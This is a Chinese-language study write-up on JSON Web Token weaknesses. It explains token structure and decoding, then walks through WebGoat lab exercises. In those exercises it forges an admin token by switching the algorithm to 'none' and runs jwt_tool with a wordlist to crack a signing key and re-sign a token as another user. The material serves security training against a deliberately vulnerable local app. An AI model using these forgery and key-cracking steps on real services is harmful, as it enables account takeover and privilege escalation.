JWT漏洞學習
JWT漏洞學習
什麼是JWT?
JWT是JSON Web Token的縮寫,它是一串帶有宣告資訊的字串,由服務端使用加密演算法對資訊簽名,以保證其完整性和不可偽造性。Token裡可以包含所有必要的資訊,這樣服務端就無需儲存任何關於使用者或會話的資訊了。JWT可用於身份認證,會話狀態維持以及資訊交換等任務。
JSON Web令牌結構是什麼?
JWT由三部分構成,分別稱為header,payload和signature,各部分用“.”相連構成一個完整的Token,形如xxxxx.yyyyy.zzzzz
下面一張圖明確顯示了該結構:
令牌是base64編碼的,由三部分組成header.claims.signature
{ "alg":"HS256", "typ":"JWT" } . { "exp": 1416471934, "user_name": "user", "scope": [ "read", "write" ], "authorities": [ "ROLE_ADMIN", "ROLE_USER" ], "jti": "9bc92a44-0b1a-4c5e-be70-da52075b9a84", "client_id": "my-client-with-secret" } . qxNjYSPIKSURZEMqLQQPw1Zdk6Le2FdGHRYZG7SQnNk
令牌資料解碼
由於Header和Payload部分是使用可逆base64方法編碼的,因此任何能夠看到令牌的人都可以讀取資料。
要讀取內容,您只需要將每個部分傳遞給base64解碼函式,以下是一些示例:
Linux base64工具(帶有-d標誌用於解碼):
$ echo eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9 | base64 -d
{"typ":"JWT","alg":"HS256"}
瀏覽器JavaScript控制檯:
>> atob("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9") "{"typ":"JWT","alg":"HS256"}"
Powershell:
PS C:\> [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64Strin
g("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9"))
{"typ":"JWT","alg":"HS256"}
Pyhton:
>>> import base64
>>> print(base64.b64decode('eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9'))
{"typ":"JWT","alg":"HS256"}
靶場練習
靶場下載
實驗使用靶場:WEBGOAT
https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.M17/webgoat-server-8.0.0.M17.jar
如何執行:
java -jar webgoat-server-8.0.0.M17.jar
訪問http://localhost:8080/WebGoat/即可。
特徵識別
首先我們需要識別應用程式正在使用JWT,最簡單的方法是在代理工具的歷史記錄中搜索JWT正則表示式:
[= ]ey[A-Za-z0-9_-]*\.[A-Za-z0-9._-]* -網址安全的JWT版本
[= ]ey[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]* -所有JWT版本(可能誤報)
以burpsuite舉例,在Proxy-HTTP history-File by search term中填入上訴正則表示式,切記勾選“區分大小寫”和“正則表示式”選項:
靶場實驗
Page4
GET /WebGoat/JWT/votings HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost:8080/WebGoat/start.mvc
Cookie: access_token=eyJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE2MDYzNTgwNzAsImFkbWluIjoiZmFsc2UiLCJ1c2VyIjoiVG9tIn0.uuxUOl2GoZaVEY8TsKJte0adKMGVd5Eywu3ys-nNIetgg0vfPLC68mMoat-Pp9z20it0AzFfEEEy2YgIZXJKEg; JSESSIONID=6C55033D91301896A8FAB9BA824DDDDC
X-Forwarded-For: 127.0.0.1
token:
eyJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE2MDYzNTgwNzAsImFkbWluIjoiZmFsc2UiLCJ1c2VyIjoiVG9tIn0.uuxUOl2GoZaVEY8TsKJte0adKMGVd5Eywu3ys-nNIetgg0vfPLC68mMoat-Pp9z20it0AzFfEEEy2YgIZXJKEg
解碼:
Headers = {
"alg": "HS512"
}
Payload = {
"iat": 1606358070,
"admin": "false",
"user": "Tom"
}
Signature = "uuxUOl2GoZaVEY8TsKJte0adKMGVd5Eywu3ys-nNIetgg0vfPLC68mMoat-Pp9z20it0AzFfEEEy2YgIZXJKEg"
使用JWT_TOOL進行漏洞檢測
顯示存在"alg":"none"
更改Headers 中"alg"為none,Payload中"admin"為true.
注:https://jwt.io/ 該平臺不能把alg更改為none,有些師傅使用該平臺得到tokne也是神了,可以使用burpsuite中的Decoder模組,麻煩模仿別人部落格的師傅自己實驗一下好吧。
Page5
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJpYXQiOjE1MjQyMTA5MDQsImV4cCI6MTYxODkwNTMwNCwiYXVkIjoid2ViZ29hdC5vcmciLCJzdWIiOiJ0b21Ad2ViZ29hdC5jb20iLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQuY29tIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.m-jSyfYEsVzD3CBI6N39wZ7AcdKdp_GiO7F_Ym12u-0
base64解碼後的令牌
{
"typ":"JWT",
"alg":"HS256"
}
.
{
"iss":"WebGoat Token Builder",
"iat":1524210904,
"exp":1618905304,
"aud":"webgoat.org",
"sub":"[email protected]",
"username":"Tom",
"Email":"[email protected]",
"Role":[
"Manager",
"Project Administrator"]
}
.
m-jSyfYEsVzD3CBI6N39wZ7AcdKdp_GiO7F_Ym12u-0
使用JWT_TOOL跑金鑰。
python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJpYXQiOjE1MjQyMTA5MDQsImV4cCI6MTYxODkwNTMwNCwiYXVkIjoid2ViZ29hdC5vcmciLCJzdWIiOiJ0b21Ad2ViZ29hdC5jb20iLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQuY29tIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.m-jSyfYEsVzD3CBI6N39wZ7AcdKdp_GiO7F_Ym12u-0 -C -d 20k.txt
然後更改Payload中“username”為WebGoat,使用破解的金鑰victory生成新的token。
相關資料
https://www.cnblogs.com/yh-ma/p/10271720.html
https://www.cnblogs.com/xiaozi/p/12031111.html
https://www.cnblogs.com/xiaozi/p/12005929.html
https://emtunc.org/blog/11/2017/jwt-refresh-token-manipulation/